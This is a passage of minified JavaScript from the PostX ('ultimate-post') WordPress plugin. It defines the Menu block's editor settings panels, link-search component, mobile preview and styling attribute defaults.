Icon","ultimate-post")}},{position:10,data:{type:"color",key:"dropColor",label:__("Icon Color","ultimate-post")}},{position:10,data:{type:"color",key:"dropColorHvr",label:__("Icon Hover Color","ultimate-post")}},{position:15,data:{type:"range",key:"dropSize",min:0,max:200,step:1,responsive:!0,unit:["px"],label:__("Icon Size","ultimate-post")}},{position:20,data:{type:"range",key:"dropSpacing",min:0,max:200,step:1,responsive:!0,unit:["px"],label:__("Text to Icon Spacing","ultimate-post")}}],initialOpen:!1,store:e}),(0,o.createElement)(a.T,{title:__("Background Wrapper","ultimate-post"),include:[{position:30,data:{type:"color2",key:"menuBg",image:!0,label:__("Background","ultimate-post")}},{position:40,data:{type:"border",key:"menuBorder",label:__("Border","ultimate-post")}},{position:50,data:{type:"boxshadow",key:"menuShadow",step:1,unit:!0,responsive:!0,label:__("Box shadow","ultimate-post")}},{position:60,data:{type:"dimension",key:"menuRadius",step:1,unit:!0,responsive:!0,label:__("Border Radius","ultimate-post")}},{position:65,data:{type:"dimension",key:"menuMargin",step:1,unit:!0,responsive:!0,label:__("Margin","ultimate-post")}},{position:70,data:{type:"dimension",key:"menuPadding",step:1,unit:!0,responsive:!0,label:__("Padding","ultimate-post")}},{position:80,data:{type:"toggle",key:"inheritThemeWidth",label:__("Inherit Theme Width (Content)","ultimate-post")}},{position:90,data:{type:"range",key:"menuContentWidth",min:0,max:1700,step:1,responsive:!0,unit:["px","%"],label:__("Content Max-Width","ultimate-post")}}],initialOpen:!1,store:e}),(0,o.createElement)(a.T,{title:__("Advanced Style","ultimate-post"),include:[{position:1,data:{type:"text",key:"advanceId",label:__("ID","ultimate-post")}},{position:5,data:{type:"range",key:"advanceZindex",label:__("z-index","ultimate-post"),min:-100,max:1e4,step:1}},{position:30,data:{type:"textarea",key:"advanceCss",label:__("Custom CSS","ultimate-post"),placeholder:__("Add {{ULTP}} before the selector to wrap element.","ultimate-post")}},{position:15,data:{type:"toggle",key:"hideExtraLarge",pro:!0,label:__("Hide On Extra Large Display","ultimate-post")}},{position:20,data:{type:"toggle",key:"hideTablet",pro:!0,label:__("Hide On Tablet","ultimate-post")}},{position:25,data:{type:"toggle",key:"hideMobile",pro:!0,label:__("Hide On Mobile","ultimate-post")}}],initialOpen:!1,store:e})),"hasRootMenu"!=t&&(0,o.createElement)(r.Section,{slug:"hamburger",title:__("Hamburger View","ultimate-post"),icon:p.ZP.hemicon_1_line},(0,o.createElement)(a.T,{title:"inline",include:[{position:1,data:{type:"toggle",key:"menuHamAppear",label:__("Enable Hamburger Menu Conversion","ultimate-post")}},{position:4,data:{type:"range",key:"mvTransformToHam",min:0,max:1400,step:1,unit:["px"],responsive:!1,label:__("Hamburger Breakpoint","ultimate-post")}},i&&{position:9,data:{type:"range",key:"mvPopWidth",min:0,max:1400,step:1,responsive:!1,unit:["px","%"],label:__("Drawer Width","ultimate-post")}},i&&{position:20,data:{type:"select",key:"menuResStructure",inline:!0,justify:!0,pro:!0,options:[{value:"mv_dissolve",label:__("Dissolve","ultimate-post")},{value:"mv_slide",label:__("Slide","ultimate-post")},{value:"mv_accordian",label:__("Accordian","ultimate-post")}],label:__("Navigation Effect","ultimate-post")}},i&&{position:22,data:{type:"dimension",key:"hamExpandedPadding",label:__("Expanded Container Padding","ultimate-post"),step:1,unit:["px"],responsive:!1}},i&&{position:30,data:{type:"range",key:"mvAnimationDuration",min:0,max:2e3,step:1,responsive:!1,unit:!1,label:__("Animation Duration(ms)","ultimate-post")}}],initialOpen:!1,store:e}),i&&(0,o.createElement)(o.Fragment,null,(0,o.createElement)(a.T,{title:__("Hamburger Icon","ultimate-post"),include:[{position:1,data:{type:"toggle",key:"previewHamIcon",label:__("Preview","ultimate-post")}},{position:5,data:{type:"icon",key:"mvHamIcon",hideFilter:!0,label:__("Choose Ham Icon","ultimate-post"),selection:["hemicon_1_line","hemicon_2_line","hemicon_3_line","hamicon_5_line","hamicon_6_line","hemicon_2_solid"]}},{position:10,data:{type:"range",key:"mvHamIconSize",min:6,max:200,step:1,responsive:!1,label:__("Icon Size","ultimate-post")}},{position:20,data:{type:"tab",content:[{name:"normal",title:__("Normal","ultimate-post"),options:[{type:"color",key:"hamVClr",label:__("Color","ultimate-post")},{type:"color2",key:"hamVBg",label:__("Background","ultimate-post")},{type:"border",key:"hamVBorder",label:__("Border","ultimate-post")},{type:"dimension",key:"hamVRadius",label:__("Border Radius","ultimate-post"),step:1,unit:["px"],responsive:!0},{type:"boxshadow",key:"hamVShadow",label:__("Box shadow","ultimate-post")}]},{name:"hover",title:__("Hover","ultimate-post"),options:[{type:"color",key:"hamVClrHvr",label:__("Color","ultimate-post")},{type:"color2",key:"hamVBgHvr",label:__("Background","ultimate-post")},{type:"border",key:"hamVBorderHvr",label:__("Border","ultimate-post")},{type:"dimension",key:"hamVRadiusHvr",label:__("Border Radius","ultimate-post"),step:1,unit:["px"],responsive:!0},{type:"boxshadow",key:"hamVShadowHvr",label:__("Box shadow","ultimate-post")}]}]}},{position:10,data:{type:"dimension",key:"hamVPadding",label:__("Padding","ultimate-post"),step:1,unit:["px"],responsive:!0}}],initialOpen:!1,store:e}),(0,o.createElement)(a.T,{title:__("Navigation Icon","ultimate-post"),include:[{position:5,data:{type:"icon",key:"naviIcon",selection:a.ov,label:__("choose Icon","ultimate-post")}},{position:5,data:{type:"icon",key:"naviExpIcon",label:__("Expanded Icon","ultimate-post")}},{position:10,data:{type:"range",key:"naviIconSize",min:0,max:200,step:1,responsive:!1,label:__("Icon Size","ultimate-post")}},{position:10,data:{type:"color",key:"naviIconClr",label:__("Color","ultimate-post")}},{position:10,data:{type:"color",key:"naviIconClrHvr",label:__("Hover Color","ultimate-post")}}],initialOpen:!1,store:e}),(0,o.createElement)(a.T,{title:__("Close Icon","ultimate-post"),include:[{position:5,data:{type:"icon",key:"closeIcon",selection:["close_line","close_circle_line"],hideFilter:!0,label:__("Choose Close Icon","ultimate-post")}},{position:10,data:{type:"range",key:"closeSize",min:0,max:200,step:1,responsive:!1,label:__("Icon Size","ultimate-post")}},{position:20,data:{type:"tab",content:[{name:"normal",title:__("Normal","ultimate-post"),options:[{type:"color",key:"closeClr",label:__("Icon Color","ultimate-post")},{type:"color",key:"closeWrapBg",label:__("Wrap BG","ultimate-post")}]},{name:"hover",title:__("Hover","ultimate-post"),options:[{type:"color",key:"closeClrHvr",label:__("Color","ultimate-post")},{type:"color",key:"closeWrapBgHvr",label:__("Wrap BG Hover","ultimate-post")}]}]}},{position:40,data:{type:"dimension",key:"closeSpace",response:!1,label:__("Spacing","ultimate-post"),step:1,unit:["px"],responsive:!1}},{position:45,data:{type:"dimension",key:"closePadding",label:__("Padding","ultimate-post"),step:1,unit:["px"],responsive:!1}},{position:50,data:{type:"dimension",key:"closeRadius",label:__("Border Radius","ultimate-post"),step:1,unit:["px"],responsive:!1}},{position:55,data:{type:"border",key:"closeBorder",label:__("Border","ultimate-post"),step:1,unit:["px"],responsive:!1}}],initialOpen:!1,store:e}),(0,o.createElement)(a.T,{title:__("Menu Items","ultimate-post"),include:[{position:1,data:{type:"toggle",key:"menuMvInheritCss",label:__("Inherit Parent Block CSS","ultimate-post")}},{position:40,data:{type:"color",key:"mvItemColor",label:__("Color","ultimate-post")}},{position:40,data:{type:"color2",key:"mvItemBg",label:__("Background","ultimate-post")}},{position:40,data:{type:"color",key:"mvItemColorHvr",label:__("Hover Color","ultimate-post")}},{position:40,data:{type:"color2",key:"mvItemBgHvr",label:__("Hover Background","ultimate-post")}},{position:40,data:{type:"range",key:"mvItemSpace",label:__("Spacing Between","ultimate-post"),min:0,max:200,step:1,responsive:!1}},{position:40,data:{type:"typography",key:"mvItemTypo",label:__("Typography","ultimate-post")}},{position:40,data:{type:"border",key:"mvItemBorder",label:__("Border","ultimate-post")}},{position:40,data:{type:"dimension",key:"mvItemRadius",label:__("Border Radius","ultimate-post"),step:1,unit:!0,responsive:!0}},{position:40,data:{type:"dimension",key:"mvItemPadding",label:__("Padding","ultimate-post"),step:1,unit:!0,responsive:!0}}],initialOpen:!1,store:e}),(0,o.createElement)(a.T,{title:__("Menu Header","ultimate-post"),include:[{position:40,data:{type:"color2",key:"mvHeadBg",image:!1,label:__("Header BG","ultimate-post")}},{position:40,data:{type:"dimension",key:"mvHeadPadding",step:1,unit:["px","%","em"],responsive:!0,label:__("Header Padding","ultimate-post")}},{position:40,data:{type:"border",key:"mvHeadBorder",label:__("Header Border","ultimate-post"),step:1,unit:["px"],responsive:!1}},{position:40,data:{type:"text",key:"mvHeadtext",label:__("Menu Label","ultimate-post")}},{position:40,data:{type:"color",key:"backClr",label:__("Label Color","ultimate-post")}},{position:40,data:{type:"color",key:"backClrHvr",label:__("Label Hover Color","ultimate-post")}},{position:40,data:{type:"typography",key:"backTypo",label:__("Label Typography","ultimate-post")}},{position:40,data:{type:"icon",key:"backIcon",label:__("Choose Back Icon","ultimate-post")}},{position:40,data:{type:"range",key:"backIconSize",min:6,max:200,step:1,responsive:!1,label:__("Back Icon Size","ultimate-post")}},{position:40,data:{type:"range",key:"backIconSpace",min:0,max:200,step:1,responsive:!1,label:__("Text to Icon Gap","ultimate-post")}}],initialOpen:!1,store:e}),(0,o.createElement)(a.T,{title:__("Container","ultimate-post"),include:[{position:10,data:{type:"color2",key:"mvBodyBg",label:__("Background","ultimate-post"),image:!1}},{position:20,data:{type:"dimension",key:"mvBodyPadding",label:__("Padding","ultimate-post"),step:1,unit:!0,responsive:!0}},{position:30,data:{type:"border",key:"mvBodyBorder",label:__("Border","ultimate-post")}},{position:40,data:{type:"boxshadow",key:"mvBodyShadow",label:__("Box shadow","ultimate-post")}},{position:50,data:{type:"color",key:"mvOverlay",label:__("Background Overlay","ultimate-post"),image:!1}}],initialOpen:!1,store:e})))))},9612:(e,t,l)=>{"use strict";l.d(t,{k:()=>u});var o=l(67294),a=l(22217),i=l(64766);const{__}=wp.i18n,{useState:n,useEffect:r}=wp.element,{TextControl:s,Spinner:p,Placeholder:c}=wp.components,u=e=>{const{callback:t,params:l,hasStep:u}=e,[d,m]=n(""),[g,y]=n(!0),[b,v]=n(1),[h,f]=n({_title:"",_url:"",_target:"_self"}),[k,w]=n([]),[x,T]=n(!1);r((()=>{(e=>{const t=e||(""==d?{isInitialSuggestions:!0,initialSuggestionsSearchOptions:{perPage:"6"}}:{});wp?.coreData?.__experimentalFetchLinkSuggestions(d,t).then((e=>{w(e),g&&y(!1)})).catch((e=>{w([]),console.error("Error fetching link suggestions:",e)}))})(l)}),[d]);const _=(e,l)=>{u?(v(2),f({...h,_title:e||"",_url:l||""})):t({...h,_title:e||"",_url:l||""})},C=(e,t)=>{f({...h,[t]:e})};return 1==b?(0,o.createElement)("div",{className:"ultp-menu-searchdropdown-con"},(0,o.createElement)("div",{className:"ultp-menu-search-text"},(0,o.createElement)("input",{type:"text",placeholder:"Search or Type Url",onChange:e=>m(e.target.value)}),(0,o.createElement)("div",{className:"ultp-menu-search-add "+(d?"__active":""),onClick:()=>d&&_("",d)},i.ZP.top_left_angle_line)),g?(0,o.createElement)(c,{className:"ultp-backend-block-loading ultp-menu-block",label:__("Fetching…","ultimate-post")},(0,o.createElement)(p,null)):(0,o.createElement)("div",{className:"ultp-menu-search-items"},k.map(((e,t)=>(0,o.createElement)("div",{onClick:()=>_(e.title,e.url),key:t},(0,o.createElement)("div",null,e.title),(0,o.createElement)("div",{className:"__type"},e.type)))))):(0,o.createElement)("div",{className:"ultp-section-accordion ultp-section-fetchurl",id:"ultp-sidebar-inline"},(0,o.createElement)("div",{className:"ultp-section-show ultp-toolbar-section-show"},(0,o.createElement)(s,{__nextHasNoMarginBottom:!0,value:h._title,placeholder:"Type Label",label:"Label",onChange:e=>C(e,"_title")}),(0,o.createElement)("div",{className:"ultp-field-selflink"},(0,o.createElement)("label",null,"Link"),(0,o.createElement)("div",null,(0,o.createElement)("span",{className:"ultp-link-section"},(0,o.createElement)("span",{className:"ultp-link-input"},(0,o.createElement)("input",{type:"text",onChange:e=>C(e.target.value,"_url"),value:h._url,placeholder:"Type Url"}),h._url&&(0,o.createElement)("span",{className:"ultp-image-close-icon dashicons dashicons-no-alt",onClick:()=>C("","_url")})),(0,o.createElement)("span",{className:"ultp-link-options"},(0,o.createElement)("span",{className:"ultp-collapse-section",onClick:()=>{T(!x)}},(0,o.createElement)("span",{className:`ultp-short-collapse ${x&&" active"}`})))),x&&(0,o.createElement)("div",{className:"ultp-short-content active"},(0,o.createElement)(a.Z,{value:h._target,label:"Link Target",options:[{value:"_self",label:__("Same Tab","ultimate-post")},{value:"_blank",label:__("New Tab","ultimate-post")}],onChange:e=>C(e,"_target")})))),(0,o.createElement)("div",{className:"ultp-section-fetchurl-add",onClick:()=>t(h)},__("Save","ultimate-post"))))}},50960:(e,t,l)=>{"use strict";l.d(t,{n:()=>i});var o=l(67294),a=l(64766);const i=e=>{const{blockId:t,backIcon:l,closeIcon:i,mvHamIcon:n,naviIcon:r,mvHeadtext:s,previewHamIcon:p,menuAlign:c}=e.attributes,u="right"==c?{"margin-left":"auto"}:"left"==c?{"margin-right":"auto"}:{margin:"auto"};return p?(0,o.createElement)("div",{style:{display:"block",width:"fit-content",...u},className:"ultp-mv-ham-icon ultp-active"},a.ZP[n]):(0,o.createElement)("div",{className:"ultp-mobile-view-container-preview",style:{backgroundImage:`url(${ultp_data.url}assets/img/blocks/menu/mobile_preview.png)`}},(0,o.createElement)("div",{className:"ultp-mobile-view-container ultp-editor"},(0,o.createElement)("div",{className:"ultp-mobile-view-wrapper"},(0,o.createElement)("div",{className:"ultp-mobile-view-head"},(0,o.createElement)("div",{className:"ultp-mv-back-label-con"},a.ZP[l],(0,o.createElement)("div",{className:"ultp-mv-back-label"},s)),(0,o.createElement)("div",{className:"ultp-mv-close"},a.ZP[i])),(0,o.createElement)("div",{className:"ultp-mobile-view-body"},(0,o.createElement)("div",{"data-bid":"",className:"wp-block-ultimate-post-menu-item"},(0,o.createElement)("div",{"data-parentbid":`.ultp-block-${t||"null"}`,className:"ultp-menu-item-wrapper"},(0,o.createElement)("div",{className:"ultp-menu-item-label-container"},(0,o.createElement)("a",{className:"ultp-menu-item-label ultp-menuitem-pos-aft"},(0,o.createElement)("div",{className:"ultp-menu-item-label-text"},"Home"))))),(0,o.createElement)("div",{"data-bid":"",className:"wp-block-ultimate-post-menu-item "},(0,o.createElement)("div",{"data-parentbid":`.ultp-block-${t||"null"}`,className:"ultp-menu-item-wrapper"},(0,o.createElement)("div",{className:"ultp-menu-item-label-container"},(0,o.createElement)("a",{className:"ultp-menu-item-label ultp-menuitem-pos-aft"},(0,o.createElement)("div",{className:"ultp-menu-item-label-text"},"Blog")),(0,o.createElement)("div",{className:"ultp-menu-item-dropdown"},a.ZP[r])))),(0,o.createElement)("div",{"data-bid":"",className:"wp-block-ultimate-post-menu-item "},(0,o.createElement)("div",{"data-parentbid":`.ultp-block-${t||"null"}`,className:"ultp-menu-item-wrapper"},(0,o.createElement)("div",{className:"ultp-menu-item-label-container"},(0,o.createElement)("a",{className:"ultp-menu-item-label ultp-menuitem-pos-aft"},(0,o.createElement)("div",{className:"ultp-menu-item-label-text"},"Features")),(0,o.createElement)("div",{className:"ultp-menu-item-dropdown"},a.ZP[r])))),(0,o.createElement)("div",{"data-bid":"",className:"wp-block-ultimate-post-menu-item"},(0,o.createElement)("div",{"data-parentbid":`.ultp-block-${t||"null"}`,className:"ultp-menu-item-wrapper"},(0,o.createElement)("div",{className:"ultp-menu-item-label-container"},(0,o.createElement)("a",{className:"ultp-menu-item-label ultp-menuitem-pos-aft"},(0,o.createElement)("div",{className:"ultp-menu-item-label-text"},"Support"))))),(0,o.createElement)("div",{"data-bid":"",className:"wp-block-ultimate-post-menu-item "},(0,o.createElement)("div",{"data-parentbid":`.ultp-block-${t||"null"}`,className:"ultp-menu-item-wrapper"},(0,o.createElement)("div",{className:"ultp-menu-item-label-container"},(0,o.createElement)("a",{className:"ultp-menu-item-label ultp-menuitem-pos-aft"},(0,o.createElement)("div",{className:"ultp-menu-item-label-text"},"About Us")),(0,o.createElement)("div",{className:"ultp-menu-item-dropdown"},a.ZP[r]))))))))}},74955:(e,t,l)=>{"use strict";var o=l(67294),a=l(83100),i=l(6343),n=l(53283);const{__}=wp.i18n,{registerBlockType:r}=wp.blocks,s=(0,a.Z)("https://wpxpo.com/docs/postx/postx-menu/","block_docs");r("ultimate-post/menu",{title:__("Menu - PostX","ultimate-post"),icon:(0,o.createElement)("img",{src:ultp_data.url+"assets/img/blocks/menu/menu.svg",alt:"Menu PostX"}),category:"ultimate-post",description:(0,o.createElement)("span",{className:"ultp-block-info"},__("Set Up and Organize Your Site's Navigation","ultimate-post"),(0,o.createElement)("a",{target:"_blank",href:s,rel:"noreferrer"},__("Documentation","ultimate-post"))),keywords:[__("menu","ultimate-post"),__("mega","ultimate-post"),__("mega menu","ultimate-post")],supports:{html:!1,reusable:!1,align:["center","wide","full"]},example:{attributes:{previewImg:!1}},edit:i.Z,save:n.Z,attributes:{blockId:{type:"string",default:""},currentPostId:{type:"string",default:""},previewImg:{type:"string",default:""},menuMvResCss:{type:"string",default:"",style:[{selector:""}]},menuInline:{type:"boolean",default:!0,style:[{depends:[{key:"menuInline",condition:"==",value:!1}]},{depends:[{key:"menuInline",condition:"==",value:!0}],selector:"{{ULTP}} > .ultp-menu-wrapper > .ultp-menu-content > .block-editor-inner-blocks > .block-editor-block-list__layout,\n                            .postx-page {{ULTP}} > .ultp-menu-wrapper > .ultp-menu-content { flex-direction: row; }"}]},menuAlign:{type:"string",default:"center"},menuAlignItems:{type:"string",default:"stretch",style:[{selector:"{{ULTP}} > .ultp-menu-wrapper > .ultp-menu-content > .block-editor-inner-blocks > .block-editor-block-list__layout,\n                            .postx-page {{ULTP}} > .ultp-menu-wrapper > .ultp-menu-content { align-items: {{menuAlignItems}}; }"}]},menuItemGap:{type:"object",default:{lg:"16",ulg:"px"},style:[{selector:"{{ULTP}}.ultpMenuCss > .ultp-menu-wrapper > .ultp-menu-content > .block-editor-inner-blocks > .block-editor-block-list__layout, .postx-page {{ULTP}}.ultpMenuCss > .ultp-menu-wrapper > .ultp-menu-content { gap: {{menuItemGap}};}"}]},menuBg:{type:"object",default:{openColor:0,type:"color",color:"",size:"cover",repeat:"no-repeat",loop:!0},style:[{selector:"{{ULTP}}.ultpMenuCss > .ultp-menu-wrapper"}]},menuBorder:{type:"object",default:{openBorder:0,width:{top:0,right:0,bottom:0,left:0},color:"#dfdfdf"},style:[{selector:"{{ULTP}}.ultpMenuCss > .ultp-menu-wrapper"}]},menuShadow:{type:"object",default:{openShadow:0,width:{top:1,right:1,bottom:1,left:1},color:"#037fff"},style:[{selector:"{{ULTP}}.ultpMenuCss > .ultp-menu-wrapper"}]},menuRadius:{type:"object",default:{lg:{top:"",bottom:"",unit:"px"}},style:[{selector:"{{ULTP}}.ultpMenuCss > .ultp-menu-wrapper { border-radius: {{menuRadius}};}"}]},menuMargin:{type:"object",default:{lg:{top:"",bottom:"",unit:"px"}},style:[{selector:"{{ULTP}}.ultpMenuCss > .ultp-menu-wrapper { margin:{{menuMargin}}; }"}]},menuPadding:{type:"object",default:{lg:{top:"",bottom:"",unit:"px"}},style:[{selector:"{{ULTP}}.ultpMenuCss > .ultp-menu-wrapper { padding:{{menuPadding}}; }"}]},inheritThemeWidth:{type:"boolean",default:!0,style:[{selector:"{{ULTP}}.ultpMenuCss > .ultp-menu-wrapper > .ultp-menu-content { max-width: 100%; }"}]},menuContentWidth:{type:"object",default:{lg:"1140",ulg:"px"},style:[{depends:[{key:"inheritThemeWidth",condition:"==",value:!1}],selector:"{{ULTP}}.ultpMenuCss > .ultp-menu-wrapper > .ultp-menu-content { max-width: {{menuContentWidth}};}"}]},dropIcon:{type:"string",default:"collapse_bottom_line"},dropColor:{type:"string",default:"#2E2E2E",style:[{selector:'.ultpMenuCss .ultp-menu-item-wrapper[data-parentbid="{{ULTP}}"] > .ultp-menu-item-label-container .ultp-menu-item-dropdown svg { color: {{dropColor}}; }'}]},dropColorHvr:{type:"string",default:"#2E2E2E",style:[{selector:'.ultpMenuCss .wp-block-ultimate-post-menu-item:hover > .ultp-menu-item-wrapper[data-parentbid="{{ULTP}}"] > .ultp-menu-item-label-container .ultp-menu-item-dropdown svg { color: {{dropColorHvr}}; }'}]},dropSize:{type:"object",default:{lg:"12",ulg:"px"},style:[{selector:'.ultp-menu-item-wrapper[data-parentbid="{{ULTP}}"] > .ultp-menu-item-label-container .ultp-menu-item-dropdown svg { height: {{dropSize}}; width: {{dropSize}}; }'}]},dropSpacing:{type:"object",default:{lg:"8",ulg:"px"},style:[{selector:'.ultpMenuCss .ultp-menu-item-wrapper[data-parentbid="{{ULTP}}"] > .ultp-menu-item-label-container { gap: {{dropSpacing}}; }'}]},itemTypo:{type:"object",default:{openTypography:1,size:{lg:16,unit:"px"},height:{lg:"20",unit:"px"},decoration:"none",family:"",weight:400,transform:"capitalize"},style:[{selector:'.ultpMenuCss .ultp-menu-item-wrapper[data-parentbid="{{ULTP}}"] > .ultp-menu-item-label-container .ultp-menu-item-label-text'}]},itemColor:{type:"string",default:"#2E2E2E",style:[{selector:'.ultpMenuCss .ultp-menu-item-wrapper[data-parentbid="{{ULTP}}"] > .ultp-menu-item-label-container .ultp-menu-item-label-text { color: {{itemColor}}; }'}]},itemBg:{type:"object",default:{openColor:0,type:"color",color:""},style:[{selector:'.ultpMenuCss .ultp-menu-item-wrapper[data-parentbid="{{ULTP}}"] > .ultp-menu-item-label-container'}]},itemShadow:{type:"object",default:{openShadow:0,width:{top:1,right:1,bottom:1,left:1},color:"#037fff"},style:[{selector:'.ultpMenuCss .ultp-menu-item-wrapper[data-parentbid="{{ULTP}}"] > .ultp-menu-item-label-container'}]},currentItemStyle:{type:"boolean",default:!0},itemColorHvr:{type:"string",default:"#037fff",style:[{depends:[{key:"currentItemStyle",condition:"==",value:!1}],selector:'.ultpMenuCss .wp-block-ultimate-post-menu-item:hover > .ultp-menu-item-wrapper[data-parentbid="{{ULTP}}"] > .ultp-menu-item-label-container .ultp-menu-item-label-text { color: {{itemColorHvr}}; }'},{depends:[{key:"currentItemStyle",condition:"==",value:!0}],selector:'.ultpMenuCss .wp-block-ultimate-post-menu-item > .ultp-current-link.ultp-menu-item-wrapper[data-parentbid="{{ULTP}}"] > .ultp-menu-item-label-container .ultp-menu-item-label-text,\n                    .ultpMenuCss .wp-block-ultimate-post-menu-item:hover > .ultp-menu-item-wrapper[data-parentbid="{{ULTP}}"] > .ultp-menu-item-label-container .ultp-menu-item-label-text { color: {{itemColorHvr}}; }'}]},itemBgHvr:{type:"object",default:{openColor:0,type:"color",color:"#6ee7b7"},style:[{depends:[{key:"currentItemStyle",condition:"==",value:!1}],selector:'.ultpMenuCss .wp-block-ultimate-post-menu-item:hover > .ultp-menu-item-wrapper[data-parentbid="{{ULTP}}"] > .ultp-menu-item-label-container'},{depends:[{key:"currentItemStyle",condition:"==",value:!0}],selector:'.ultpMenuCss .wp-block-ultimate-post-menu-item:hover > .ultp-menu-item-wrapper[data-parentbid="{{ULTP}}"] > .ultp-menu-item-label-container,\n                    .ultpMenuCss .wp-block-ultimate-post-menu-item > .ultp-current-link.ultp-menu-item-wrapper[data-parentbid="{{ULTP}}"] > .ultp-menu-item-label-container'}]},itemShadowHvr:{type:"object",default:{openShadow:0,width:{top:1,right:1,bottom:1,left:1},color:"#6ee7b7"},style:[{depends:[{key:"currentItemStyle",condition:"==",value:!1}],selector:'.ultpMenuCss .wp-block-ultimate-post-menu-item:hover > .ultp-menu-item-wrapper[data-parentbid="{{ULTP}}"] > .ultp-menu-item-label-container'},{depends:[{key:"currentItemStyle",condition:"==",value:!0}],selector:'.ultpMenuCss .wp-block-ultimate-post-menu-item:hover > .ultp-menu-item-wrapper[data-parentbid="{{ULTP}}"] > .ultp-menu-item-label-container,\n                    .ultpMenuCss .wp-block-ultimate-post-menu-item > .ultp-current-link.ultp-menu-item-wrapper[data-parentbid="{{ULTP}}"] > .ultp-menu-item-label-container\n                    '}]},itemBorderHvr:{type:"object",default:{openBorder:0,width:{top:1,right:1,bottom:1,left:1},color:"#037fff",type:"solid"},style:[{depends:[{key:"currentItemStyle",condition:"==",value:!1}],selector:'.ultpMenuCss .wp-block-ultimate-post-menu-item:hover > .ultp-menu-item-wrapper[data-parentbid="{{ULTP}}"] > .ultp-menu-item-label-container'},{depends:[{key:"currentItemStyle",condition:"==",value:!0}],selector:'.ultpMenuCss .wp-block-ultimate-post-menu-item:hover > .ultp-menu-item-wrapper[data-parentbid="{{ULTP}}"] > .ultp-menu-item-label-container,\n                    .ultpMenuCss .wp-block-ultimate-post-menu-item > .ultp-current-link.ultp-menu-item-wrapper[data-parentbid="{{ULTP}}"] > .ultp-menu-item-label-container'}]},itemBorder:{type:"object",default:{openBorder:0,width:{top:1,right:1,bottom:1,left:1},color:"#037fff",type:"solid"},style:[{selector:'.ultpMenuCss .ultp-menu-item-wrapper[data-parentbid="{{ULTP}}"] > .ultp-menu-item-label-container'}]},itemRadius:{type:"object",default:{lg:"",unit:"px"},style:[{selector:'.ultpMenuCss .ultp-menu-item-wrapper[data-parentbid="{{ULTP}}"] > .ultp-menu-item-label-container { border-radius:{{itemRadius}}; }'}]},itemPadding:{type:"object",default:{lg:{top:"4",bottom:"4",left:"4",right:"4",unit:"px"}},style:[{selector:'.ultpMenuCss .ultp-menu-item-wrapper[data-parentbid="{{ULTP}}"] > .ultp-menu-item-label-container { padding:{{itemPadding}}; }'}]},iconAfterText:{type:"boolean",default:!1},iconSize:{type:"object",default:{lg:"16",ulg:"px"},style:[{selector:'\n                        .ultp-menu-item-wrapper[data-parentbid="{{ULTP}}"] > .ultp-menu-item-label-container .ultp-menu-item-icon svg,\n                        .ultp-menu-item-wrapper[data-parentbid="{{ULTP}}"] > .ultp-menu-item-label-container .ultp-menu-item-icon img { height: {{iconSize}}; width: {{iconSize}}; }'}]},iconSpacing:{type:"object",default:{lg:"10",ulg:"px"},style:[{selector:'.ultp-menu-item-wrapper[data-parentbid="{{ULTP}}"] > .ultp-menu-item-label-container .ultp-menu-item-label { gap: {{iconSpacing}}; }'}]},iconColor:{type:"string",default:"#000",style:[{selector:'.ultpMenuCss .ultp-menu-item-wrapper[data-parentbid="{{ULTP}}"] > .ultp-menu-item-label-container .ultp-menu-item-icon svg { color:{{iconColor}}; stroke:{{iconColor}}; }'}]},iconColorHvr:{type:"string",default:"#000",style:[{selector:'.ultpMenuCss .wp-block-ultimate-post-menu-item:hover > .ultp-menu-item-wrapper[data-parentbid="{{ULTP}}"] > .ultp-menu-item-label-container .ultp-menu-item-icon svg { color:{{iconColorHvr}}; stroke:{{iconColorHvr}};}'}]},hasRootMenu:{type:"string",default:""},menuHamAppear:{type:"boolean",default:!0},mvTransformToHam:{type:"string",default:"800",style:[{depends:[{key:"menuHamAppear",condition:"==",value:!0}]}]},previewMobileView:{type:"string",default:""},mvPopWidth:{type:"string",default:{_value:"84",unit:"%",onlyUnit:!0},style:[{depends:[{key:"hasRootMenu",condition:"!=",value:"hasRootMenu"}],selector:"{{ULTP}} .ultp-mobile-view-wrapper { width: {{mvPopWidth}}; }"}]},menuResStructure:{type:"string",default:"mv_slide"},hamExpandedPadding:{type:"object",default:{top:"10",right:"0",bottom:"10",left:"15",unit:"px"},style:[{depends:[{key:"hasRootMenu",condition:"!=",value:"hasRootMenu"},{key:"menuResStructure",condition:"==",value:"mv_accordian"}],selector:"{{ULTP}} .ultp-mobile-view-container .ultp-mobile-view-wrapper .ultp-mobile-view-body .wp-block-ultimate-post-menu-item .ultp-menu-item-content { padding: {{hamAccorPadding}}; }"}]},mvAnimationDuration:{type:"string",default:"400"},mvDrawerPosition:{type:"string",default:"left"},previewHamIcon:{type:"string",default:""},mvHamIcon:{type:"string",default:"hamicon_3",style:[{depends:[{key:"hasRootMenu",condition:"!=",value:"hasRootMenu"}]}]},mvHamIconSize:{type:"string",default:"24",style:[{depends:[{key:"hasRootMenu",condition:"!=",value:"hasRootMenu"}],selector:"{{ULTP}} .ultp-mv-ham-icon svg { height: {{mvHamIconSize}}px; width: {{mvHamIconSize}}px; }"}]},hamVClr:{type:"string",default:"#070707",style:[{depends:[{key:"hasRootMenu",condition:"!=",value:"hasRootMenu"}],selector:"\n                        {{ULTP}} .ultp-mv-ham-icon svg { color: {{hamVClr}}; }"}]},hamVBg:{type:"object",default:{openColor:0,type:"color",color:""},style:[{depends:[{key:"hasRootMenu",condition:"!=",value:"hasRootMenu"}],selector:"{{ULTP}} .ultp-mv-ham-icon"}]},hamVBorder:{type:"object",default:{openBorder:0,width:{top:0,right:0,bottom:0,left:0},color:"#dfdfdf"},style:[{depends:[{key:"hasRootMenu",condition:"!=",value:"hasRootMenu"}],selector:"{{ULTP}} .ultp-mv-ham-icon"}]},hamVRadius:{type:"object",default:{lg:"",unit:"px"},style:[{depends:[{key:"hasRootMenu",condition:"!=",value:"hasRootMenu"}],selector:"{{ULTP}} .ultp-mv-ham-icon { border-radius: {{hamVRadius}}; }"}]},hamVShadow:{type:"object",default:{openShadow:0,width:{top:1,right:1,bottom:1,left:1},color:"#037fff"},style:[{depends:[{key:"hasRootMenu",condition:"!=",value:"hasRootMenu"}],selector:"{{ULTP}} .ultp-mv-ham-icon"}]},hamVPadding:{type:"object",default:{lg:{top:"",bottom:"",unit:"px"}},style:[{depends:[{key:"hasRootMenu",condition:"!=",value:"hasRootMenu"}],selector:"{{ULTP}} .ultp-mv-ham-icon { padding: {{hamVPadding}}; }"}]},hamVClrHvr:{type:"string",default:"#070707",style:[{depends:[{key:"hasRootMenu",condition:"!=",value:"hasRootMenu"}],selector:"\n                        {{ULTP}} .ultp-mv-ham-icon:hover svg { color: 